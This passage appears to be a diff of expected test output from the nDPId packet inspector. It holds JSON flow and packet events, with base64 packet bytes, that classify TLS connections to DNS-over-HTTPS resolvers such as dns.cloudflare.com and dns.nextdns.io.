vWV6dC+e+ksCIkxwJmTgcBQXwfuBwje22m5Cj2nv\/zq4aMsV7kiFOS1VcPYLEbw+c4UolvdLrBBCbMxCQZeGhjAzGdsZDuX\/6sRIGIbuHAE8nIh+KJ0joM4KoZNtLXSA2HqbNN+kRQ5gTFmAp4mqAOgsHxAv6V1xCZg8P3MEffeog7NEB4\/K8wtwtgVyjvZaZ4E5jbN5Fjj\/jqK88SEXhkPYnN+on2bA\/r\/BMBIaoCajkogUyGLoyIPMT+pBrWa+wfZKdLurwPxZw+jCxKJC0\/mmFBL81N3ktV2QA+uWulN8QPCd7cD0\/Hjf2QklIJga5shMEJkHY6px3Tk68O3abNmIreZ6S\/N71agsTVbVTSaRlprW4p5D79LYThW+q2zikyKF2eG4VtVQ1Z087sY8sCBmmZG8ETPN5Xq0TN3Q1mXCkwjS9y4DvkEf4d2VKsFN6yj110+kONDzC8lVgKicr46oqIhZ9cyUDwr5+MuFqHiF2KMvJx9XA7v9+a265RIEavlSRTRm3PXbeYNOWUADrJWXjguUacdKmikyCoiD9vRp7ll6YxsV5jSfRT\/9SmZeNE+aTDy2wakB7qY1oeeLE4kVchDyQa22zUAtVHOgOvTZInJYA\/takDFgegJnQaYWISVIejbCOHLLvY\/LGAj1CyqRrh1\/LJm06TJxFQn5cMNb5SSEJFNyxF75PSPT288zWx2Va0aIhDIB+vku9QlaiV4ac8CwDTFNaqbQKECa5ibv22eB002L0jyDWacUoUluFvwofh+CTE377hEPfvjsRjX+V3P\/erPya8F4fW7JQkFJgCrTK1VaoDF64ZvLzNQJ5aCIC3Js6D+sD6g4jOpLHGy2zHMlk9wTN+yBybuSBsrJL9uS5j3JgQRC167kARpn8\/3wkN3\/lvlFPoVYVhj99l\/NeW6y\/YdomeNnyw0D7qas3wz1t0EQFticUf9LLfRMzRHEf20AYOoy9Fonct0XWUb6fLDU7CQJTqCHU8Eiy+rgD2t\/dxE4NlpfZ2ZSbDZ7QWFdftipHKlR4nJqLL0sU6kjZ8SydsZ8oAinHCIV9v5PNYgUBa8WbGYb2kgxJMSN3jbYzsoGwAsbdeAghc0S7LurZvISJXwa0jBqUzUHZmweZXCdDnfDiPc92KCXG9hA13VfXTouQnTd0zyBwPxIcvLGDhAu1CCSmBlGZrOEjmOi1\/i4ug\/A=="} -00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378577,"flow_last_seen":946739378607,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":1393,"midstream":1,"thread_ts_msec":946739378607,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378577,"flow_last_seen":946739378607,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":1393,"midstream":1,"thread_ts_msec":946739378607,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":946739378610,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739378610,"pkt":"REREREREZmZmZmZmCABFAABoLytAAH4GiGoKAAABaBwcIoO8AbvZKqYtoyMiIFAYAfVFVQAAFAMDAAEBFwMDADUQNuPt6m2nY9MgXiEHZRB5L+gDtuMOMxUUfy82Uox32sOXoFpXHp3NUSfU3Rmr6gABtUijkQ=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":946739380697,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739380697,"pkt":"REREREREZmZmZmZmCABFAAFIsgNAAH4Gh+8KAAABAQAAAdIqAbvH6z5LSWNp6VAYAfbC9wAAFgMBARsBAAEXAwNccnLckexdP3Wz7tsKiknbwUElui2FZGSKODu9LnFkjSDCKDL2dIORj+O\/DGu\/+ddISHKLc0yxsHWSEQ0iee1a7AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zLmNsb3VkZmxhcmUuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIM\/CjtFE6\/BfV0qVOcMMUIig11i56\/tpHaQ1FlARye8w"} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04322{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":946739380725,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2892,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2892,"pkt_l4_len":2858,"thread_ts_msec":946739380725,"pkt":"ZmZmZmZmRERERERECABFAAs+VjZAADoGHccBAAABCgAAAQG70ipJY2npx+s\/a1AYAELM7QAAFgMDAHoCAAB2AwNqFtv3xWSYHbL\/TEVcxTgtPyY5syhT1Ar0J7GcYm2olyDCKDL2dIORj+O\/DGu\/+ddISHKLc0yxsHWSEQ0iee1a7BMBAAAuADMAJAAdACABwPRBPqMH6tP2UgTdU38yy4IBdMrNy3Y26n6nkJgoEgArAAIDBBQDAwABARcDAwqMAOf8HgLdG4eR2zQrlVcXNJK6gSgekjnntDDuH\/5mItzTS2PjuRorCZtp1e456Yzxd\/c9Pjo0KqOApsf0Oet3HLAxOPX\/4mq0oqPJv6\/pWYh6XkL49x7kn3sA8FLizWIik5oy6pRjSBWFf6tqxUO+Djt17wQK6yhMls9hUq1ClHJUh6Qn273NZpiWOuHCd9wGeCfeInHvS8qk0EqIdne\/5O3+AKgM\/cALapdKbBhIoAyrPwqC2hLjGuasAzda3QO\/+ESHum\/F9d6o\/5K+8IYpY8o8qtVJ6Drg8futbzGhAS87lZYW5UeuuFH05CzhM6cODq7gNj4mbPjTJ5ApTRpwsXEw0cwu6tAiKdHBHu4s131JOS1nhPpDpOs1W8FqhOijP5pChk7nVfwQ9Bu1xYiYmTlZWYP4bC0IhVSltsY4+ffd9etk6QNu1u5Seoh1QaWRe4DU8GYPqDdj9ywHuBnTu\/kdk6yObRcYizbhLyG5JiQSyxA9bv7iPMzOSI\/oPD6Rw4c6cy1qJywZ7F9o\/W7KUU6pYYhqWRcunfBOy2cedxZtVaWxcAQGD7VjEr1GjI\/ndJEL6DV\/vUO5PSsHgdX\/GScVrZdS\/KHwHxAHOv1BpKxNHl+ElIeVfCJc4tBsNkoBf5+COT0BV1cqDq\/0TqIcpVxlMv3\/7JDTZZTI\/wMxcbTZkEC580\/OL4P7o7ZBv1lVciiiGUxirK0Wn0VmKVkOPUH1VVDEVtxbspQjAQAudOqLnKMivdYYnLWKcLFjjfuE8XwFn1JkF2YyGgtdu+0wxe7V3QdQyeX6wSKDfGOBn1RHTiZSQJLrjf\/MjK6PK6+6dmcX2K\/Nos\/HKCWzOCSGOxH6pgvl94s\/0dDawx7iAmW0aKHP7fN\/Qsuj7qBRlYmeX3wDSe3ACAyO8PJtifBKRUnx+i44zF\/TEZT9\/0f9hj1yXYZhM4IttxvCtS3N7k187lM2JB6HB4DmePSpA5UfxEPRq71lNWUsDLAAiN3ekJSKoZ7PUpp\/6SJsuSwyITjf4EqBLpeWL9MrWeNXoUk5W1F7hWZmXxUwbc9PMEuirTVJUIeKJcMT3hUo1x6K9jQ+3H\/3FjLuAvSaGN20\/JlmWzUhH2c19MbTsBdNUca8p5h9ftAYWxNZFi+BPME56GacRIjusosOaDm6TM6NIeJtcd5nQ0Y6NbfwEe7MdB0akdNH1SZ5FpPCUXE+5h9eWmGzxT6gCZx6qvA46+kjmSPa8Cj85dDYPgUItxPMDzQDmcDkFl4Jtoqp7CsVbgDs2FaRSNSCg+ZMEThJQx0\/Aqz+vGM8Axcf5cpBgdqJqmkgft7WVM6LgxM0bWa6ReLOTbftdrjvt51qS7oW8iSFCaAMyVHnB9nNub1rCB71JGnHgmpLaDriPHmvZHyXG+tF3YYxqKFpVLMzSELDqif9S44Mrb9ZjnIWKvGQryM\/QSKoEg5X7zctl4vxNBFap6BlJhqRr3fm7FAc37N2CcUPqfx3Q8d+odOusP4Ls3Xq2Sur1UmBSNW9zqMAV9eCaagN4swiO+HX9D1JhZPxXTW9QWyDXi2zI1HI7LUB70fqeJS7u5T5BooNTQeoNzZVCvWOXWLt+ZiIbxI46okrDHFQXi\/x2G\/UqXdfkOEinNyh78FxOnrKcOtvfU1vQdaz7Z3d1S6XTGxIbp7Avs8yqCBkfYYx0okhQoRYkFViIAKhs8EJ22ENemkpy\/xMNRrY7HXIqAF0plC7ASy6aRPBxNQLpe6Ed5IaeUHDV+pWuEiLAgXAO3BIyMmN+dKwyJRSjGew81SAxYCXzqNGK2p7GdpO\/XP0maghqEG1aIROtTBX2ArldnERnpk4NXjDbfgsSkzP20ClfXeN4yjZTmAjINRHsDFyBG2kVPsbWM6bJ6sXUqNBkjHzH8mUguB01CThNReqO2rGsLiKr5qTMAwxKxjfEdoEJ+OdtfVMDr3B0PaBDiW6NDXICwJTMjrTiHsqLMySrS2T3BXPc1yBL+jDROuKYyhTZQzCA6ktzSKC6wAMC\/2RMbHnV4JUqSuJoXnZI1jiGQfafDh9qm0ZR91\/Upntxs\/kWZ9Zofn9x4gsvGL94XY2stn+kYJ+lpR5T38ZBRBOsXu8bAGsKAP+3wt7PlEML8VYdMSv1Y8XhaZ4vQZT4mxjokM8a+\/vbBm5OFXEOAsw3UpeMp5Pdlywdfks9xANyyHcs7XyT+4nzRjV93W+RbJVksh761\/0CsogB0Bf4AeRq1b8bSy2mVWD\/C9oBFlc4PSw+jhx1uKdorr8amCiJ2bwSUXaBBKYKGtf3eKS0Vrr8DWhAzmAupA8TRMiBwDgWH\/pSpuuBxo4fKT36lTdVMpKIp966xzVRYeAdyJ8dQTy5jeDQL1o\/K9FAvaIxIHdqy3Ai9UpxdTmYwoZXk1RGWSFQPWK2eEqydFLHkwLiG2A9OQ8pCYrZlqHUn1snev7fQAbwrXFOXDJskS+CYp+0GQvu\/Fu37N\/vYvDe9yQ2BjQyb\/Aq\/mNLHkdVzTu+oIIX6og2jNse2SlImfdMuiBssQFePUieOP3nrkgegmZDkJvZU8\/IJtyIPGhvEr4wy0KRjmbk1R5TV1oh+Gvyump800hgoeZ6yINLishVXjkSrZbw30TzgVyIHMXbfVH5cMb\/otpjX8v74ViZ68NiQoVQGCiu9Qccb9jITaHI7YqId83HAhD0Mgcvql8x4riVhsLhWBp7KARZMNylg6FCWQzYhkomLcDqOeaHr\/i3Kucv0p5GzUzkUvhbOyyBarVy1r5EY3Ff\/LeERfwiWeu9JMjSlW9a76FWzNvpbjiVQvAXjpJS+B6vW0S676\/2F\/QVlBvmv\/1e3jfE46NEORC\/KvStAu1+NCVXXkgYYjYaavSuMFqEVMBLpNt3pqmD175kYHYjG6R6TDv0nmjRk\/fdkSOg4ydMi2g43e05SDICPCTBrKL+H8pdmtKEp3WxofXZCtNR+ckTvaTdfJXZMWJbImpAgp0edudixTNqo9z3f5BRBQ1U170EzzThEQIMmS6RHUG4MBWpfatZDm+5s5WqxzAc+f48z+5\/Rjpm1MjT7FAj2QOS2mS1pZuw8jR7f9mlmDHlYUa7yULFKz+EOcDFjny+TGuKCw6tBmvp0uAgOgbWkR3PGwLQlgJNN5qcasz\/DdlRFFRc1kdK872NuK41RPGMSa34kfvjKckPj3jn4ntsF1i9WcRtXZaTKddZmAVoibh8F7o+\/2BqWfWHshjLjbv2UXOWt85MGeIvvR+JAZ4lQKxhMp4ApqHsqTnv9vjAIsk+AJwp0L3kf96BrAf5lxFwLByeiu2ScazZunSG5IvLxJ2cCZzgYOFm\/xSZPCmFYvKNJw727A0qH0cpDBKVk4Z5vvRen3ROFERblATF0imHD72RVGcQ\/rMrcnTAneuS+605QxQwV5cyssndlHujOT5cJjQwi4Me+A9i\/U+gGMItbvzyiV\/bH\/dnSH\/6+REX1pIGyZTP+9n2MXLAZnibrKAMIRfK2TIfrOe5jmJF94vcBm\/\/5ycPeTZII89RYTOm\/OYD7dCL\/Fj+p2ZF9GMMq1KmH\/crTCIqHICoTep9ezhaM3lurJnltFyZNv3oliEoTfl"} -00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380697,"flow_last_seen":946739380725,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":3126,"flow_avg_l4_payload_len":1563,"midstream":1,"thread_ts_msec":946739380725,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380697,"flow_last_seen":946739380725,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":3126,"flow_avg_l4_payload_len":1563,"midstream":1,"thread_ts_msec":946739380725,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":946739380727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739380727,"pkt":"REREREREZmZmZmZmCABFAABosgVAAH4GiM0KAAABAQAAAdIqAbvH6z9rSWN0\/1AYAfXCFwAAFAMDAAEBFwMDADVke5XeBLKUZMMwsdywo3cwWM6dcwvPxEIBrrKuQwAVECVGBCt8L\/1vmMSczXlzhvKSsbEzJA=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":946739380870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739380870,"pkt":"REREREREZmZmZmZmCABFAAFEC7lAAH4G5eQKAAABLVocAII6AbvzwYfFjc3Z3lAYAfYLTQAAFgMBARcBAAETAwME0sG+tMqbxpRl1DV8Z2dnX5LfzpIiHTt74xC1bVbZqCBq5Am0FD9Ax\/Z0hd9jpGF+x36pK3fx2LqXRJeDdYghvgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOZG5zLm5leHRkbnMuaW8ABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAghy6XniNnPGDj9u0r7tzchu6tmfTKqCDkZge3YRdGMjI="} -00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":946739380903,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739380903,"pkt":"ZmZmZmZmRERERERECABFAAXUAxlAADQGM\/UtWhwACgAAAQG7gjqNzdne88GI4VAQAnmV4AAAFgMDAHoCAAB2AwNSUVDmrRSBFJr3VlpPTiOBfna69z7Ip3AgaZ4JY8XZPCBq5Am0FD9Ax\/Z0hd9jpGF+x36pK3fx2LqXRJeDdYghvhMBAAAuACsAAgMEADMAJAAdACBgLhCqxZDxBYT0wty93r8WAtFFYd34UV+f0SYd9yF0RxQDAwABARcDAwAgNdJG6I7V9ce0uN\/W8MyCm58pWjfsCFZXXJnMcWaU4P8XAwMJ4l4xzn1tklFeMfXUSkilkOHkR2CrV0Fk61C4hUjayiVX3XCUzF\/nVmk3NsjsUuGQs+ELPFl7aLMJpdeipyb\/BRKM7DDOdlmSjSZFpz3sI+4Ap1vb842GKpbBCp1KIgOgnmXfMMwnL4uKzNN2+XpL8V9LwuMNROahwk9tJrSx3BZQnvVy5qktKVugzkoTSb9fPpFovSjkUbQUBQuFWl2cxLyQBO6gjWiaDBpgoqREkqW2UGurTHpBXCvX7xTK+SGfs3VLNGPL\/jM509wXezmGXrBZolGpSBcCmwqP5AGjSUkJQ2KFF8\/5I5DLe1rWw\/7rCzdCJgW7dwItPpQigYvEpUhaTQyjzhLtXm4Br1gtr+Iuf0HPHYTCtm1Z9061ijlO7AesYAg3NSX4lpTeBeQNzqwAGQi0kxU+8BsfAI4uhNY4fwD\/tgZRm00kCDUGr0Hw1O0\/9wcQo2OrT4hVI8sBPv9rovACUd1xTXQBUu4c2UNVQr\/DAwgtr3oGHXN\/yf6hHksHqaO6ThyUELGPZgyTaAEJeYSlV\/UuFXosuXrXk+4M4bQmtm8xQA\/hPEgZw03CxD+XIQ9CziCJc2Lx3r4h2FdBiMwzohldpvHSBUXM2GuHl07Muv9yz1FfyzqYAimU2llIffa6XcR6\/N9ex4PCYrVYeRifJmT\/hN608lQ56Pm4ckRgIW72lS0ILwL91eG\/PWLw1TWr9OHqib8dqID1N28WvnDQAc1WG+OfvFA5Lx7KtiZ9\/3KI7f7RCYG\/5anpOjN3Yvo+yrHT\/\/9yxTpA2EDhXmw1I+drMKCfdVXEwoRqrQDXQ3qu16NE+piWO4zYtxH6MrZOf5GKUoqj85zhZkJ6n3Wtdfmw0p2w7uWnPZarz2kRT1hGv0H7uWAwQsIO2witiCTCAX0VhCKqX5eg9HlVQxEJ8e6aZG6udk28L+hlu2DjHm2cK3LT5siYCZ+61rOCmuWYzAzB4PZwDYNVRnV0GsHgMCnZc9N4\/ighhHZqiYL81av1zekzo7Qcc39eQmJB1\/vhuqI4+c3vKnv7ROdK1hsAX7hP\/VFs8H8ZF9FxFv36aFuAu1HQxIxhZTCwXDQcu5TzVx1PL5uguNjR7pwef7T5COi4aTCL27yji1k+uS4xQgf7uM7lfjr7UlwSz76e6z\/NdrgDABxN2pYomW51+xON8iXDOy0cXgxInpylLI6lmV7hJWGh+rssjjMTkzOSia\/tb6HN8MDXz8ND7qC4wdRBL+K2XXzk7CxXSZKHbU7oBKE3VuTcSRmBvFAj4jzbuAW9nVI5Yw9M7KxJ0oNCiAer+7rkuV1\/dCwQt\/7\/zkSRGAemKSurrkjoqozLCUcuNRu2YlaJLAc\/PeEJmeHXWSos8ReOKG9libwm6aBbFjBhBGqk11oBFxYMJe3fE8zx0cKng5v141kUW5K8KykDBQPlm38itlnDfJBFaB9Jn9F1Dk+fc1GMvxAKNX1KD189yDAOfdy35szVs+4vU19xgaD3Asb+3zoIgGeHaF3v5zAsODf1V7zFmYGD1A5VyodE+SZcg8yBGqWdCjN6Dq7+yW5n4whEBATh9+W8PK0m19STC9EnY\/KFQ8CMbZglLaqGH9UHLlwuaNZUfgFyrj24dAMianUUp6I5pp2CbweoDVXgQfGbkHcfYC\/73I2CAYRQxi4XFXP\/UJ7vD4Iv633KLKMEpQYwdikhrjOP"} -00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380870,"flow_last_seen":946739380903,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739380903,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 